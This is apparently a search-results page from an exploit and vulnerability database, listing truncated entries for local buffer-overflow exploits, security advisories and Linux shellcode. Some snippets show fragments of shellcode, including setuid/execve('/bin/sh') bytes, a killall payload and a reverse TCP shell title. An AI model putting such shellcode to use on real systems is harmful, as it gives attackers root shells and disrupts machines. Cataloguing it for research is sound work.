2384 matches found
Malware monitor - leveraging PyREBox for malware analysis
This post was authored by Xabier Ugarte Pedrero In July 2017 we released PyREBox, a Python Scriptable Reverse Engineering Sandbox as an open source tool. This project is part of our continuous effort to create new tools to improve our workflows. PyREBox is a versatile instrumentation framework...
PMS 0.42 - Local Stack-Based Overflow (ROP)
Exploit Author: Juan Sacco - http://exploitpack.com Tested on: Kali i686 GNU/Linux Description: PMS 0.42 is prone to a local unauthenticated stack-based overflow The vulnerability is due to an unproper filter of user supplied input while reading the configuration file and parsing the malicious...
PMS 0.42 Stack-Based Buffer Overflow Exploit
Exploit for linux platform in category dos / poc Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer local module Tested on: Kali i686 GNU/Linux Description: PMS 0.42 is prone to a local unauthenticated stack-based overflow The vulnerability is...
PMS 0.42 Stack-Based Buffer Overflow
Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer local module Tested on: Kali i686 GNU/Linux Description: PMS 0.42 is prone to a local unauthenticated stack-based overflow The vulnerability is due to an unproper filter of user supplied input...
Linux/x86 exit(0) Shellcode (5 bytes)
/ Smallest Linux/x86 - exit0 shellcode 5 bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 5 exitchotu: file format elf32-i386 Disassembly of section .text: 08048060 : 8048060: 6a 01 push 0x1 8048062: 58 pop eax 8048063: cd 80 int 0x80 ===============POC by Anurag...
SC 7.16 - Stack-Based Buffer Overflow Exploit
Exploit for linux platform in category local exploits Exploit Author: Juan Sacco - http://www.exploitpack.com Bug found using Exploit Pack - Local fuzzer feature. Tested on: GNU/Linux - Kali Linux Filename: pool/main/s/sc/sc7.16-4+b2i386.deb Description: SC v7.16 is prone to a basic stack-based...
SC 7.16 Buffer Overflow
Exploit Author: Juan Sacco - http://www.exploitpack.com Bug found using Exploit Pack - Local fuzzer feature. Tested on: GNU/Linux - Kali Linux Filename: pool/main/s/sc/sc7.16-4+b2i386.deb Description: SC v7.16 is prone to a basic stack-based buffer overflow vulnerability because the application...
SC 7.16 - Stack-Based Buffer Overflow
SC 7.16 - Stack-Based Buffer Overflow Exploit Author: Juan Sacco - http://www.exploitpack.com Bug found using Exploit Pack - Local fuzzer feature. Tested on: GNU/Linux - Kali Linux Filename: pool/main/s/sc/sc7.16-4+b2i386.deb Description: SC v7.16 is prone to a basic stack-based buffer overflow...
SC 7.16 - Stack-Based Buffer Overflow
Exploit Author: Juan Sacco - http://www.exploitpack.com Bug found using Exploit Pack - Local fuzzer feature. Tested on: GNU/Linux - Kali Linux Filename: pool/main/s/sc/sc7.16-4+b2i386.deb Description: SC v7.16 is prone to a basic stack-based buffer overflow vulnerability because the application...
[SECURITY] Fedora 26 Update: torbrowser-launcher-0.2.9-1.fc26
Tor Browser Launcher is intended to make Tor Browser easier to install and use for GNU/Linux users. You install torbrowser-launcher from your distribution's package manager and it handles everything else: Downloads and installs the most recent version of Tor Browser in your lan guage and for your...
Quagga bgpd is affected by multiple vulnerabilities
Overview The Quagga BGP daemon bgpd prior to version 1.2.3 may be vulnerable to multiple issues that may result in denial of service, information disclosure, or remote code execution. Description CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer - CVE-2018-5378...
lighttpd < 1.4.28 Insecure Temporary File Creation
According to its banner, the version of lighttpd running on the remote host is prior to 1.4.28. Therefore, it may be, affected by the following vulnerability : - The configuration file for the FastCGI PHP support for lighttpd before 1.4.28 on Debian GNU/Linux creates a socket file with a...
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)
include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER tha push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov al,0bh "\x52" //push edx /Termina la cadena //bin/sh con un 0 "\x68\x6e\x2f\x73\x68"...
Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)
/ Title : reversetcpbindshell 118 bytes Date : 04 October 2013 Author : Russell Willis Testd on: Linux/x8664 SMP Debian 3.2.46-1+deb7u1 x8664 GNU/Linux $ objdump -D reversetcpbindshell -M intel reversetcpbindshell: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 : 400080: ...
Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)
Linux/x8664 sethostname & killall 33 bytes shellcode Date: 2010-04-26 Author: zbt Tested on: x8664 Debian GNU/Linux / ; sethostname"Rooted !"; ; kill-1, SIGKILL; section .text global start start: ;-- setHostName"Rooted !"; 22 bytes --; mov al, 0xaa mov r8, 'Rooted !' push r8 mov rdi, rsp mov sil,...
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
/ Title: Linux/x86 - execve/bin/sh Polymorphic Shellcode 53 bytes Date: 10-Jan-2018 Exploit Author: Debashis Pal SLAE-1122 Tested on: i686 GNU/Linux '//bin/sh' = 0x68732f6e 0x69622f2f polymorphic.nasm global start section .text start: add esi, 0x30 ;junk xor ecx, ecx mul ecx mov dword esp-4, ecx...
Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure
Summary Drive production profitability with Fiery servers and workflow products. See which Fiery digital front end is right for your current or future print engines and business needs. Manage all your printers from a single screen using this intuitive print job management interface. Description...
Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure
Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure Vendor: Electronics for Imaging, Inc. Product web page: http://www.efi.com Affected version: EFI Fiery Controller SW2.0 Xerox DocuColor 260, 250, 242...
Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure
Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure Vendor: Electronics for Imaging, Inc. Product web page: http://www.efi.com Affected version: EFI Fiery Controller SW2.0 Xerox DocuColor 260, 250, 242 Summary: Drive production profitability with Fiery servers and workflow...
The vulnerability in the software for converting images on the Debian GNU/Linux operating system arises from overflowing buffers in dynamic memory, allowing an attacker to cause the application to terminate abnormally.
The vulnerability of the software for converting image formats in the Debian GNU/Linux operating system is caused by an overflow in the buffer of dynamic memory. Exploiting this vulnerability allows a malicious actor to cause the application to terminate abnormally by using a specially crafted cu...